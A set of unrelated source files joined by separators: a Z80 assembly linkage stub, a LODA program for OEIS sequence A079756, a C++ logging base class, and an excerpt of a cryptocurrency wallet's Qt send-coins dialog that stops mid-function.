48 00 00 44 44 44 00 00 00 44 00 00 00 00 00 48 00 00 00 00 44 48 00 00 00 00 00 00 00 44 48 44 00 00 44 00 44 00 00 00 00 00 44 00 00 44 48 44 00 00 00 00 00 00
*/
|
; CALLER linkage for function pointers
XLIB write
LIB write_callee
XREF ASMDISP_WRITE_CALLEE
.write
pop af
pop bc
pop de
pop hl
push hl
push de
push bc
push af
jp write_callee + ASMDISP_WRITE_CALLEE
|
; A079756: Operation count to create all permutations of n distinct elements using the "streamlined" version of Algorithm L (lexicographic permutation generation) from Knuth's The Art of Computer Programming, Vol. 4, chapter 7.2.1.2. Sequence gives number of interchanges in reversal step.
; Submitted by Christian Krause
; 0,0,4,29,215,1734,15630,156327,1719637,20635688,268264004,3755696121,56335441899,901367070474,15323240198170,275818323567179,5240548147776545,104810962955531052,2201030222066152272,48422664885455350173,1113721292365473054199,26729311016771353301006,668232775419283832525414,17374052160901379645661039,469099408344337250432848365,13134783433641443012119754544,380908719575601847351472882140,11427261587268055420544186464577,354245109205309718036869780402307,11335843494569910977179832972874258
mov $2,2
lpb $0
sub $0,1
mov $1,$3
add $2,1
add $1,$2
div $1,2
mul $1,2
sub $1,2
mul $1,$2
add $3,$1
lpe
mov $0,$3
div $0,2
|
/*
* gObject.cpp
*
* Created on: May 16, 2020
* Author: noyan
*/
#include "gObject.h"
#include <unistd.h>
const int gObject::LOGLEVEL_SILENT = 0;
const int gObject::LOGLEVEL_INFO = 1;
const int gObject::LOGLEVEL_DEBUG = 2;
const int gObject::LOGLEVEL_WARNING = 3;
const int gObject::LOGLEVEL_ERROR = 4;
gObject::gObject() {
loglevelname[0] = "Silent";
loglevelname[1] = "Info";
loglevelname[2] = "Debug";
loglevelname[3] = "Warning";
loglevelname[4] = "Error";
loglevel = LOGLEVEL_INFO;
char temp[256];
exepath = getcwd(temp, sizeof(temp));
exepath += "/";
for (int i = 0; i < exepath.size(); i++) {
if (exepath[i] == '\\') {
exepath[i] = '/';
}
}
// std::replace(0, 1, "", "");
}
gObject::~gObject() {
}
std::string gObject::gGetAppDir() {
return exepath;
}
std::string gObject::gGetAssetsDir() {
return exepath + "assets/";
}
std::string gObject::gGetImagesDir() {
return exepath + "assets/images/";
}
std::string gObject::gGetFontsDir() {
return exepath + "assets/fonts/";
}
std::string gObject::gGetModelsDir() {
return exepath + "assets/models/";
}
std::string gObject::gGetSoundsDir() {
return exepath + "assets/sounds/";
}
void gObject::setLogLevel(int logLevel) {
loglevel = logLevel;
}
void gObject::log(int logLevel, std::string tag, std::string message) {
std::cout << "[" << loglevelname[logLevel] << "] " << tag << ": " << message << std::endl;
}
void gObject::logi(std::string tag, std::string message) {
if (loglevel < LOGLEVEL_INFO) return;
log(LOGLEVEL_INFO, tag, message);
}
void gObject::logi(std::string message) {
if (loglevel < LOGLEVEL_INFO) return;
log(LOGLEVEL_INFO, abi::__cxa_demangle(typeid(*this).name(), 0, 0, 0), message);
}
void gObject::logd(std::string tag, std::string message) {
if (loglevel < LOGLEVEL_DEBUG) return;
log(LOGLEVEL_DEBUG, tag, message);
}
void gObject::logd(std::string message) {
if (loglevel < LOGLEVEL_DEBUG) return;
log(LOGLEVEL_DEBUG, abi::__cxa_demangle(typeid(*this).name(), 0, 0, 0), message);
}
void gObject::logw(std::string tag, std::string message) {
if (loglevel < LOGLEVEL_WARNING) return;
log(LOGLEVEL_WARNING, tag, message);
}
void gObject::logw(std::string message) {
if (loglevel < LOGLEVEL_WARNING) return;
log(LOGLEVEL_WARNING, abi::__cxa_demangle(typeid(*this).name(), 0, 0, 0), message);
}
void gObject::loge(std::string tag, std::string message) {
if (loglevel < LOGLEVEL_ERROR) return;
std::cerr << "[" << loglevelname[LOGLEVEL_ERROR] << "] " << tag << ": " << message << std::endl;
}
void gObject::loge(std::string message) {
if (loglevel < LOGLEVEL_ERROR) return;
loge(abi::__cxa_demangle(typeid(*this).name(), 0, 0, 0), message);
}
|
// Copyright (c) 2011-2014 The Bitcoin developers
// Copyright (c) 2014-2015 The Dash developers
// Copyright (c) 2015-2018 The PIVX developers
// Copyright (c) 2018 The SKW Core developers
// Distributed under the MIT/X11 software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include "sendcoinsdialog.h"
#include "ui_sendcoinsdialog.h"
#include "addresstablemodel.h"
#include "askpassphrasedialog.h"
#include "bitcoinunits.h"
#include "clientmodel.h"
#include "coincontroldialog.h"
#include "guiutil.h"
#include "optionsmodel.h"
#include "sendcoinsentry.h"
#include "walletmodel.h"
#include "base58.h"
#include "coincontrol.h"
#include "ui_interface.h"
#include "utilmoneystr.h"
#include "wallet.h"
#include <QMessageBox>
#include <QScrollBar>
#include <QSettings>
#include <QTextDocument>
SendCoinsDialog::SendCoinsDialog(QWidget* parent) : QDialog(parent),
ui(new Ui::SendCoinsDialog),
clientModel(0),
model(0),
fNewRecipientAllowed(true),
fFeeMinimized(true)
{
ui->setupUi(this);
#ifdef Q_OS_MAC // Icons on push buttons are very uncommon on Mac
ui->addButton->setIcon(QIcon());
ui->clearButton->setIcon(QIcon());
ui->sendButton->setIcon(QIcon());
#endif
GUIUtil::setupAddressWidget(ui->lineEditCoinControlChange, this);
addEntry();
connect(ui->addButton, SIGNAL(clicked()), this, SLOT(addEntry()));
connect(ui->clearButton, SIGNAL(clicked()), this, SLOT(clear()));
// Coin Control
connect(ui->pushButtonCoinControl, SIGNAL(clicked()), this, SLOT(coinControlButtonClicked()));
connect(ui->checkBoxCoinControlChange, SIGNAL(stateChanged(int)), this, SLOT(coinControlChangeChecked(int)));
connect(ui->lineEditCoinControlChange, SIGNAL(textEdited(const QString&)), this, SLOT(coinControlChangeEdited(const QString&)));
// UTXO Splitter
connect(ui->splitBlockCheckBox, SIGNAL(stateChanged(int)), this, SLOT(splitBlockChecked(int)));
connect(ui->splitBlockLineEdit, SIGNAL(textChanged(const QString&)), this, SLOT(splitBlockLineEditChanged(const QString&)));
// SKWX specific
QSettings settings;
if (!settings.contains("bUseObfuScation"))
settings.setValue("bUseObfuScation", false);
if (!settings.contains("bUseSwiftTX"))
settings.setValue("bUseSwiftTX", false);
bool useSwiftTX = settings.value("bUseSwiftTX").toBool();
if (fLiteMode) {
ui->checkSwiftTX->setVisible(false);
CoinControlDialog::coinControl->useObfuScation = false;
CoinControlDialog::coinControl->useSwiftTX = false;
} else {
ui->checkSwiftTX->setChecked(useSwiftTX);
CoinControlDialog::coinControl->useSwiftTX = useSwiftTX;
}
connect(ui->checkSwiftTX, SIGNAL(stateChanged(int)), this, SLOT(updateSwiftTX()));
// Coin Control: clipboard actions
QAction* clipboardQuantityAction = new QAction(tr("Copy quantity"), this);
QAction* clipboardAmountAction = new QAction(tr("Copy amount"), this);
QAction* clipboardFeeAction = new QAction(tr("Copy fee"), this);
QAction* clipboardAfterFeeAction = new QAction(tr("Copy after fee"), this);
QAction* clipboardBytesAction = new QAction(tr("Copy bytes"), this);
QAction* clipboardPriorityAction = new QAction(tr("Copy priority"), this);
QAction* clipboardLowOutputAction = new QAction(tr("Copy dust"), this);
QAction* clipboardChangeAction = new QAction(tr("Copy change"), this);
connect(clipboardQuantityAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardQuantity()));
connect(clipboardAmountAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardAmount()));
connect(clipboardFeeAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardFee()));
connect(clipboardAfterFeeAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardAfterFee()));
connect(clipboardBytesAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardBytes()));
connect(clipboardPriorityAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardPriority()));
connect(clipboardLowOutputAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardLowOutput()));
connect(clipboardChangeAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardChange()));
ui->labelCoinControlQuantity->addAction(clipboardQuantityAction);
ui->labelCoinControlAmount->addAction(clipboardAmountAction);
ui->labelCoinControlFee->addAction(clipboardFeeAction);
ui->labelCoinControlAfterFee->addAction(clipboardAfterFeeAction);
ui->labelCoinControlBytes->addAction(clipboardBytesAction);
ui->labelCoinControlPriority->addAction(clipboardPriorityAction);
ui->labelCoinControlLowOutput->addAction(clipboardLowOutputAction);
ui->labelCoinControlChange->addAction(clipboardChangeAction);
// init transaction fee section
if (!settings.contains("fFeeSectionMinimized"))
settings.setValue("fFeeSectionMinimized", true);
if (!settings.contains("nFeeRadio") && settings.contains("nTransactionFee") && settings.value("nTransactionFee").toLongLong() > 0) // compatibility
settings.setValue("nFeeRadio", 1); // custom
if (!settings.contains("nFeeRadio"))
settings.setValue("nFeeRadio", 0); // recommended
if (!settings.contains("nCustomFeeRadio") && settings.contains("nTransactionFee") && settings.value("nTransactionFee").toLongLong() > 0) // compatibility
settings.setValue("nCustomFeeRadio", 1); // total at least
if (!settings.contains("nCustomFeeRadio"))
settings.setValue("nCustomFeeRadio", 0); // per kilobyte
if (!settings.contains("nSmartFeeSliderPosition"))
settings.setValue("nSmartFeeSliderPosition", 0);
if (!settings.contains("nTransactionFee"))
settings.setValue("nTransactionFee", (qint64)DEFAULT_TRANSACTION_FEE);
if (!settings.contains("fPayOnlyMinFee"))
settings.setValue("fPayOnlyMinFee", false);
if (!settings.contains("fSendFreeTransactions"))
settings.setValue("fSendFreeTransactions", false);
ui->groupFee->setId(ui->radioSmartFee, 0);
ui->groupFee->setId(ui->radioCustomFee, 1);
ui->groupFee->button((int)std::max(0, std::min(1, settings.value("nFeeRadio").toInt())))->setChecked(true);
ui->groupCustomFee->setId(ui->radioCustomPerKilobyte, 0);
ui->groupCustomFee->setId(ui->radioCustomAtLeast, 1);
ui->groupCustomFee->button((int)std::max(0, std::min(1, settings.value("nCustomFeeRadio").toInt())))->setChecked(true);
ui->sliderSmartFee->setValue(settings.value("nSmartFeeSliderPosition").toInt());
ui->customFee->setValue(settings.value("nTransactionFee").toLongLong());
ui->checkBoxMinimumFee->setChecked(settings.value("fPayOnlyMinFee").toBool());
ui->checkBoxFreeTx->setChecked(settings.value("fSendFreeTransactions").toBool());
ui->checkxSKW->hide();
minimizeFeeSection(settings.value("fFeeSectionMinimized").toBool());
}
void SendCoinsDialog::setClientModel(ClientModel* clientModel)
{
this->clientModel = clientModel;
if (clientModel) {
connect(clientModel, SIGNAL(numBlocksChanged(int)), this, SLOT(updateSmartFeeLabel()));
}
}
void SendCoinsDialog::setModel(WalletModel* model)
{
this->model = model;
if (model && model->getOptionsModel()) {
for (int i = 0; i < ui->entries->count(); ++i) {
SendCoinsEntry* entry = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(i)->widget());
if (entry) {
entry->setModel(model);
}
}
setBalance(model->getBalance(), model->getUnconfirmedBalance(), model->getImmatureBalance(),
0,0,0,
model->getWatchBalance(), model->getWatchUnconfirmedBalance(), model->getWatchImmatureBalance());
connect(model, SIGNAL(balanceChanged(CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount)), this,
SLOT(setBalance(CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount)));
connect(model->getOptionsModel(), SIGNAL(displayUnitChanged(int)), this, SLOT(updateDisplayUnit()));
updateDisplayUnit();
// Coin Control
connect(model->getOptionsModel(), SIGNAL(displayUnitChanged(int)), this, SLOT(coinControlUpdateLabels()));
connect(model->getOptionsModel(), SIGNAL(coinControlFeaturesChanged(bool)), this, SLOT(coinControlFeatureChanged(bool)));
ui->frameCoinControl->setVisible(model->getOptionsModel()->getCoinControlFeatures());
coinControlUpdateLabels();
// fee section
connect(ui->sliderSmartFee, SIGNAL(valueChanged(int)), this, SLOT(updateSmartFeeLabel()));
connect(ui->sliderSmartFee, SIGNAL(valueChanged(int)), this, SLOT(updateGlobalFeeVariables()));
connect(ui->sliderSmartFee, SIGNAL(valueChanged(int)), this, SLOT(coinControlUpdateLabels()));
connect(ui->groupFee, SIGNAL(buttonClicked(int)), this, SLOT(updateFeeSectionControls()));
connect(ui->groupFee, SIGNAL(buttonClicked(int)), this, SLOT(updateGlobalFeeVariables()));
connect(ui->groupFee, SIGNAL(buttonClicked(int)), this, SLOT(coinControlUpdateLabels()));
connect(ui->groupCustomFee, SIGNAL(buttonClicked(int)), this, SLOT(updateGlobalFeeVariables()));
connect(ui->groupCustomFee, SIGNAL(buttonClicked(int)), this, SLOT(coinControlUpdateLabels()));
connect(ui->customFee, SIGNAL(valueChanged()), this, SLOT(updateGlobalFeeVariables()));
connect(ui->customFee, SIGNAL(valueChanged()), this, SLOT(coinControlUpdateLabels()));
connect(ui->checkBoxMinimumFee, SIGNAL(stateChanged(int)), this, SLOT(setMinimumFee()));
connect(ui->checkBoxMinimumFee, SIGNAL(stateChanged(int)), this, SLOT(updateFeeSectionControls()));
connect(ui->checkBoxMinimumFee, SIGNAL(stateChanged(int)), this, SLOT(updateGlobalFeeVariables()));
connect(ui->checkBoxMinimumFee, SIGNAL(stateChanged(int)), this, SLOT(coinControlUpdateLabels()));
connect(ui->checkBoxFreeTx, SIGNAL(stateChanged(int)), this, SLOT(updateGlobalFeeVariables()));
connect(ui->checkBoxFreeTx, SIGNAL(stateChanged(int)), this, SLOT(coinControlUpdateLabels()));
ui->customFee->setSingleStep(CWallet::minTxFee.GetFeePerK());
updateFeeSectionControls();
updateMinFeeLabel();
updateSmartFeeLabel();
updateGlobalFeeVariables();
}
}
SendCoinsDialog::~SendCoinsDialog()
{
QSettings settings;
settings.setValue("fFeeSectionMinimized", fFeeMinimized);
settings.setValue("nFeeRadio", ui->groupFee->checkedId());
settings.setValue("nCustomFeeRadio", ui->groupCustomFee->checkedId());
settings.setValue("nSmartFeeSliderPosition", ui->sliderSmartFee->value());
settings.setValue("nTransactionFee", (qint64)ui->customFee->value());
settings.setValue("fPayOnlyMinFee", ui->checkBoxMinimumFee->isChecked());
settings.setValue("fSendFreeTransactions", ui->checkBoxFreeTx->isChecked());
delete ui;
}
void SendCoinsDialog::on_sendButton_clicked()
{
if (!model || !model->getOptionsModel())
return;
QList<SendCoinsRecipient> recipients;
bool valid = true;
for (int i = 0; i < ui->entries->count(); ++i) {
SendCoinsEntry* entry = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(i)->widget());
//UTXO splitter - address should be our own
CBitcoinAddress address = entry->getValue().address.toStdString();
if (!model->isMine(address) && ui->splitBlockCheckBox->checkState() == Qt::Checked) {
CoinControlDialog::coinControl->fSplitBlock = false;
ui->splitBlockCheckBox->setCheckState(Qt::Unchecked);
QMessageBox::warning(this, tr("Send Coins"),
tr("The split block tool does not work when sending to outside addresses. Try again."),
QMessageBox::Ok, QMessageBox::Ok);
return;
}
if (entry) {
if (entry->validate()) {
recipients.append(entry->getValue());
} else {
valid = false;
}
}
}
if (!valid || recipients.isEmpty()) {
return;
}
//set split block in model
CoinControlDialog::coinControl->fSplitBlock = ui->splitBlockCheckBox->checkState() == Qt::Checked;
if (ui->entries->count() > 1 && ui->splitBlockCheckBox->checkState() == Qt::Checked) {
CoinControlDialog::coinControl->fSplitBlock = false;
ui->splitBlockCheckBox->setCheckState(Qt::Unchecked);
QMessageBox::warning(this, tr("Send Coins"),
tr("The split block tool does not work with multiple addresses. Try again."),
QMessageBox::Ok, QMessageBox::Ok);
return;
}
if (CoinControlDialog::coinControl->fSplitBlock)
CoinControlDialog::coinControl->nSplitBlock = int(ui->splitBlockLineEdit->text().toInt());
QString strFunds = "";
QString strFee = "";
recipients[0].inputType = ALL_COINS;
if (ui->checkSwiftTX->isChecked()) {
recipients[0].useSwiftTX = true;
strFunds += " ";
strFunds += tr("using SwiftX");
} else {
recipients[0].useSwiftTX = false;
}
// Format confirmation message
QStringList formatted;
foreach (const SendCoinsRecipient& rcp, recipients) {
// generate bold amount string
QString amount = "<b>" + BitcoinUnits::formatHtmlWithUnit(model->getOptionsModel()->getDisplayUnit(), rcp.amount);
amount.append("</b> ").append(strFunds);
// generate monospace address string
QString address = "<span style='font-family: monospace;'>" + rcp.address;
address.append("</span>");
QString recipientElement;
if (!rcp.paymentRequest.IsInitialized()) // normal payment
{
if (rcp.label.length() > 0) // label with address
{
recipientElement = tr("%1 to %2").arg(amount, GUIUtil::HtmlEscape(rcp.label));
recipientElement.append(QString(" (%1)").arg(address));
} else // just address
{
recipientElement = tr("%1 to %2").arg(amount, address);
}
} else if (!rcp.authenticatedMerchant.isEmpty()) // secure payment request
{
recipientElement = tr("%1 to %2").arg(amount, GUIUtil::HtmlEscape(rcp.authenticatedMerchant));
} else // insecure payment request
{
recipientElement = tr("%1 to %2").arg(amount, address);
}
if (CoinControlDialog::coinControl->fSplitBlock) {
recipientElement.append(tr(" split into %1 outputs using the UTXO splitter.").arg(CoinControlDialog::coinControl->nSplitBlock));
}
formatted.append(recipientElement);
}
fNewRecipientAllowed = false;
// request unlock only if was locked or unlocked for mixing:
// this way we let users unlock by walletpassphrase or by menu
// and make many transactions while unlocking through this dialog
// will call relock
WalletModel::EncryptionStatus encStatus = model->getEncryptionStatus();
if (encStatus == model->Locked ) {
WalletModel::UnlockContext ctx(model->requestUnlock(AskPassphraseDialog::Context::Send_SKW, true));
if (!ctx.isValid()) {
// Unlock wallet was cancelled
fNewRecipientAllowed = true;
return;
}
send(recipients, strFee, formatted);
return;
}
// already unlocked or not encrypted at all
send(recipients, strFee, formatted);
}
void SendCoinsDialog::send(QList<SendCoinsRecipient> recipients, QString strFee, QStringList formatted)
{
// prepare transaction for getting txFee earlier
WalletModelTransaction currentTransaction(recipients);
WalletModel::SendCoinsReturn prepareStatus;
if (model->getOptionsModel()->getCoinControlFeatures()) // coin control enabled
prepareStatus = model->prepareTransaction(currentTransaction, CoinControlDialog::coinControl);
else
prepareStatus = model->prepareTransaction(currentTransaction);
// process prepareStatus and on error generate message shown to user
processSendCoinsReturn(prepareStatus,
BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), currentTransaction.getTransactionFee()), true);
if (prepareStatus.status != WalletModel::OK) {
fNewRecipientAllowed = true;
return;
}
CAmount txFee = currentTransaction.getTransactionFee();
QString questionString = tr("Are you sure you want to send?");
questionString.append("<br /><br />%1");
if (txFee > 0) {
// append fee string if a fee is required
questionString.append("<hr /><span style='color:#aa0000;'>");
questionString.append(BitcoinUnits::formatHtmlWithUnit(model->getOptionsModel()->getDisplayUnit(), txFee));
questionString.append("</span> ");
questionString.append(tr("are added as transaction fee"));
questionString.append(" ");
questionString.append(strFee);
// append transaction size
questionString.append(" (" + QString::number((double)currentTransaction.getTransactionSize() / 1000) + " kB)");
}
// add total amount in all subdivision units
questionString.append("<hr />");
CAmount totalAmount = currentTransaction.getTotalTransactionAmount() + txFee;
QStringList alternativeUnits;
foreach (BitcoinUnits::Unit u, BitcoinUnits::availableUnits()) {
if (u != model->getOptionsModel()->getDisplayUnit())
alternativeUnits.append(BitcoinUnits::formatHtmlWithUnit(u, totalAmount));
}
// Show total amount + all alternative units
questionString.append(tr("Total Amount = <b>%1</b><br />= %2")
.arg(BitcoinUnits::formatHtmlWithUnit(model->getOptionsModel()->getDisplayUnit(), totalAmount))
.arg(alternativeUnits.join("<br />= ")));
// Limit number of displayed entries
int messageEntries = formatted.size();
int displayedEntries = 0;
for (int i = 0; i < formatted.size(); i++) {
if (i >= MAX_SEND_POPUP_ENTRIES) {
formatted.removeLast();
i--;
} else {
displayedEntries = i + 1;
}
}
questionString.append("<hr />");
questionString.append(tr("<b>(%1 of %2 entries displayed)</b>").arg(displayedEntries).arg(messageEntries));
// Display message box
QMessageBox::StandardButton retval = QMessageBox::question(this, tr("Confirm send coins"),
questionString.arg(formatted.join("<br />")),
QMessageBox::Yes | QMessageBox::Cancel,
QMessageBox::Cancel);
if (retval != QMessageBox::Yes) {
fNewRecipientAllowed = true;
return;
}
// now send the prepared transaction
WalletModel::SendCoinsReturn sendStatus = model->sendCoins(currentTransaction);
// process sendStatus and on error generate message shown to user
processSendCoinsReturn(sendStatus);
if (sendStatus.status == WalletModel::OK) {
accept();
CoinControlDialog::coinControl->UnSelectAll();
coinControlUpdateLabels();
}
fNewRecipientAllowed = true;
}
void SendCoinsDialog::clear()
{
// Remove entries until only one left
while (ui->entries->count()) {
ui->entries->takeAt(0)->widget()->deleteLater();
}
addEntry();
updateTabsAndLabels();
}
void SendCoinsDialog::reject()
{
clear();
}
void SendCoinsDialog::accept()
{
clear();
}
SendCoinsEntry* SendCoinsDialog::addEntry()
{
SendCoinsEntry* entry = new SendCoinsEntry(this);
entry->setModel(model);
ui->entries->addWidget(entry);
connect(entry, SIGNAL(removeEntry(SendCoinsEntry*)), this, SLOT(removeEntry(SendCoinsEntry*)));
connect(entry, SIGNAL(payAmountChanged()), this, SLOT(coinControlUpdateLabels()));
updateTabsAndLabels();
// Focus the field, so that entry can start immediately
entry->clear();
entry->setFocus();
ui->scrollAreaWidgetContents->resize(ui->scrollAreaWidgetContents->sizeHint());
qApp->processEvents();
QScrollBar* bar = ui->scrollArea->verticalScrollBar();
if (bar)
bar->setSliderPosition(bar->maximum());
return entry;
}
void SendCoinsDialog::updateTabsAndLabels()
{
setupTabChain(0);
coinControlUpdateLabels();
}
void SendCoinsDialog::removeEntry(SendCoinsEntry* entry)
{
entry->hide();
// If the last entry is about to be removed add an empty one
if (ui->entries->count() == 1)
addEntry();
entry->deleteLater();
updateTabsAndLabels();
}
QWidget* SendCoinsDialog::setupTabChain(QWidget* prev)
{
for (int i = 0; i < ui->entries->count(); ++i) {
SendCoinsEntry* entry = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(i)->widget());
if (entry) {
prev = entry->setupTabChain(prev);
}
}
QWidget::setTabOrder(prev, ui->sendButton);
QWidget::setTabOrder(ui->sendButton, ui->clearButton);
QWidget::setTabOrder(ui->clearButton, ui->addButton);
return ui->addButton;
}
void SendCoinsDialog::setAddress(const QString& address)
{
SendCoinsEntry* entry = 0;
// Replace the first entry if it is still unused
if (ui->entries->count() == 1) {
SendCoinsEntry* first = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(0)->widget());
if (first->isClear()) {
entry = first;
}
}
if (!entry) {
entry = addEntry();
}
entry->setAddress(address);
}
void SendCoinsDialog::pasteEntry(const SendCoinsRecipient& rv)
{
if (!fNewRecipientAllowed)
return;
SendCoinsEntry* entry = 0;
// Replace the first entry if it is still unused
if (ui->entries->count() == 1) {
SendCoinsEntry* first = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(0)->widget());
if (first->isClear()) {
entry = first;
}
}
if (!entry) {
entry = addEntry();
}
entry->setValue(rv);
updateTabsAndLabels();
}
bool SendCoinsDialog::handlePaymentRequest(const SendCoinsRecipient& rv)
{
// Just paste the entry, all pre-checks
// are done in paymentserver.cpp.
pasteEntry(rv);
return true;
}
void SendCoinsDialog::setBalance(const CAmount& balance, const CAmount& unconfirmedBalance, const CAmount& immatureBalance,
const CAmount& zerocoinBalance, const CAmount& unconfirmedZerocoinBalance, const CAmount& immatureZerocoinBalance,
const CAmount& watchBalance, const CAmount& watchUnconfirmedBalance, const CAmount& watchImmatureBalance)
{
Q_UNUSED(unconfirmedBalance);
Q_UNUSED(immatureBalance);
Q_UNUSED(zerocoinBalance);
Q_UNUSED(unconfirmedZerocoinBalance);
Q_UNUSED(immatureZerocoinBalance);
Q_UNUSED(watchBalance);
Q_UNUSED(watchUnconfirmedBalance);
Q_UNUSED(watchImmatureBalance);
if (model && model->getOptionsModel()) {
uint64_t bal = 0;
bal = balance;
ui->labelBalance->setText(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), bal));
}
}
void SendCoinsDialog::updateDisplayUnit()
{
TRY_LOCK(cs_main, lockMain);
if (!lockMain) return;
setBalance(model->getBalance(), model->getUnconfirmedBalance(), model->getImmatureBalance(),
0,0,0,
model->getWatchBalance(), model->getWatchUnconfirmedBalance(), model->getWatchImmatureBalance());
coinControlUpdateLabels();
ui->customFee->setDisplayUnit(model->getOptionsModel()->getDisplayUnit());
updateMinFeeLabel();
updateSmartFeeLabel();
}
void SendCoinsDialog::updateSwiftTX()
{
QSettings settings;
settings.setValue("bUseSwiftTX", ui->checkSwiftTX->isChecked());
CoinControlDialog::coinControl->useSwiftTX = ui->checkSwiftTX->isChecked();
coinControlUpdateLabels();
}
void SendCoinsDialog::processSendCoinsReturn(const WalletModel::SendCoinsReturn& sendCoinsReturn, const QString& msgArg, bool fPrepare)
{
bool fAskForUnlock = false;
QPair<QString, CClientUIInterface::MessageBoxFlags> msgParams;
// Default to a warning message, override if error message is needed
msgParams.second = CClientUIInterface::MSG_WARNING;
// This comment is specific to SendCoinsDialog usage of WalletModel::SendCoinsReturn.
// WalletModel::TransactionCommitFailed is used only in WalletModel::sendCoins()
// all others are used only in WalletModel::prepareTransaction()
switch (sendCoinsReturn.status) {
case WalletModel::InvalidAddress:
msgParams.first = tr("The recipient address is not valid, please recheck.");
break;
case WalletModel::InvalidAmount:
msgParams.first = tr("The amount to pay must be larger than 0.");
break;
case WalletModel::AmountExceedsBalance:
msgParams.first = tr("The amount exceeds your balance.");
break;
case WalletModel::AmountWithFeeExceedsBalance:
msgParams.first = tr("The total exceeds your balance when the %1 transaction fee is included.").arg(msgArg);
break;
case WalletModel::DuplicateAddress:
msgParams.first = tr("Duplicate address found, can only send to each address once per send operation.");
break;
case WalletModel::TransactionCreationFailed:
msgParams.first = tr("Transaction creation failed!");
msgParams.second = CClientUIInterface::MSG_ERROR;
break;
case WalletModel::TransactionCommitFailed:
msgParams.first = tr("The transaction was rejected! This might happen if some of the coins in your wallet were already spent, such as if you used a copy of wallet.dat and coins were spent in the copy but not marked as spent here.");
msgParams.second = CClientUIInterface::MSG_ERROR;
break;
case WalletModel::InsaneFee:
msgParams.first = tr("A fee %1 times higher than %2 per kB is considered an insanely high fee.").arg(10000).arg(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), ::minRelayTxFee.GetFeePerK()));
break;
// included to prevent a compiler warning.
case WalletModel::OK:
default:
return;
}
// Unlock wallet if it wasn't fully unlocked already
if(fAskForUnlock) {
model->requestUnlock(AskPassphraseDialog::Context::Unlock_Full, false);
if(model->getEncryptionStatus () != WalletModel::Unlocked) {
msgParams.first = tr("Error: The wallet was unlocked only to anonymize coins. Unlock canceled.");
}
else {
// Wallet unlocked
return;
}
}
emit message(tr("Send Coins"), msgParams.first, msgParams.second);
}
void SendCoinsDialog::minimizeFeeSection(bool fMinimize)
{
ui->labelFeeMinimized->setVisible(fMinimize);
ui->buttonChooseFee->setVisible(fMinimize);
ui->buttonMinimizeFee->setVisible(!fMinimize);
ui->frameFeeSelection->setVisible(!fMinimize);
ui->horizontalLayoutSmartFee->setContentsMargins(0, (fMinimize ? 0 : 6), 0, 0);
fFeeMinimized = fMinimize;
}
void SendCoinsDialog::on_buttonChooseFee_clicked()
{
minimizeFeeSection(false);
}
void SendCoinsDialog::on_buttonMinimizeFee_clicked()
{
updateFeeMinimizedLabel();
minimizeFeeSection(true);
}
void SendCoinsDialog::setMinimumFee()
{
ui->radioCustomPerKilobyte->setChecked(true);
ui->customFee->setValue(CWallet::minTxFee.GetFeePerK());
}
void SendCoinsDialog::updateFeeSectionControls()
{
ui->sliderSmartFee->setEnabled(ui->radioSmartFee->isChecked());
ui->labelSmartFee->setEnabled(ui->radioSmartFee->isChecked());
ui->labelSmartFee2->setEnabled(ui->radioSmartFee->isChecked());
ui->labelSmartFee3->setEnabled(ui->radioSmartFee->isChecked());
ui->labelFeeEstimation->setEnabled(ui->radioSmartFee->isChecked());
ui->labelSmartFeeNormal->setEnabled(ui->radioSmartFee->isChecked());
ui->labelSmartFeeFast->setEnabled(ui->radioSmartFee->isChecked());
ui->checkBoxMinimumFee->setEnabled(ui->radioCustomFee->isChecked());
ui->labelMinFeeWarning->setEnabled(ui->radioCustomFee->isChecked());
ui->radioCustomPerKilobyte->setEnabled(ui->radioCustomFee->isChecked() && !ui->checkBoxMinimumFee->isChecked());
ui->radioCustomAtLeast->setEnabled(ui->radioCustomFee->isChecked() && !ui->checkBoxMinimumFee->isChecked());
ui->customFee->setEnabled(ui->radioCustomFee->isChecked() && !ui->checkBoxMinimumFee->isChecked());
}
void SendCoinsDialog::updateGlobalFeeVariables()
{
if (ui->radioSmartFee->isChecked()) {
nTxConfirmTarget = (int)25 - (int)std::max(0, std::min(24, ui->sliderSmartFee->value()));
payTxFee = CFeeRate(0);
} else {
nTxConfirmTarget = 25;
payTxFee = CFeeRate(ui->customFee->value());
fPayAtLeastCustomFee = ui->radioCustomAtLeast->isChecked();
}
fSendFreeTransactions = ui->checkBoxFreeTx->isChecked();
}
void SendCoinsDialog::updateFeeMinimizedLabel()
{
if (!model || !model->getOptionsModel())
return;
if (ui->radioSmartFee->isChecked())
ui->labelFeeMinimized->setText(ui->labelSmartFee->text());
else {
ui->labelFeeMinimized->setText(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), ui->customFee->value()) +
((ui->radioCustomPerKilobyte->isChecked()) ? "/kB" : ""));
}
}
void SendCoinsDialog::updateMinFeeLabel()
{
if (model && model->getOptionsModel())
ui->checkBoxMinimumFee->setText(tr("Pay only the minimum fee of %1").arg(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), CWallet::minTxFee.GetFeePerK()) + "/kB"));
}
void SendCoinsDialog::updateSmartFeeLabel()
{
if (!model || !model->getOptionsModel())
return;
int nBlocksToConfirm = (int)25 - (int)std::max(0, std::min(24, ui->sliderSmartFee->value()));
CFeeRate feeRate = mempool.estimateFee(nBlocksToConfirm);
if (feeRate <= CFeeRate(0)) // not enough data => minfee
{
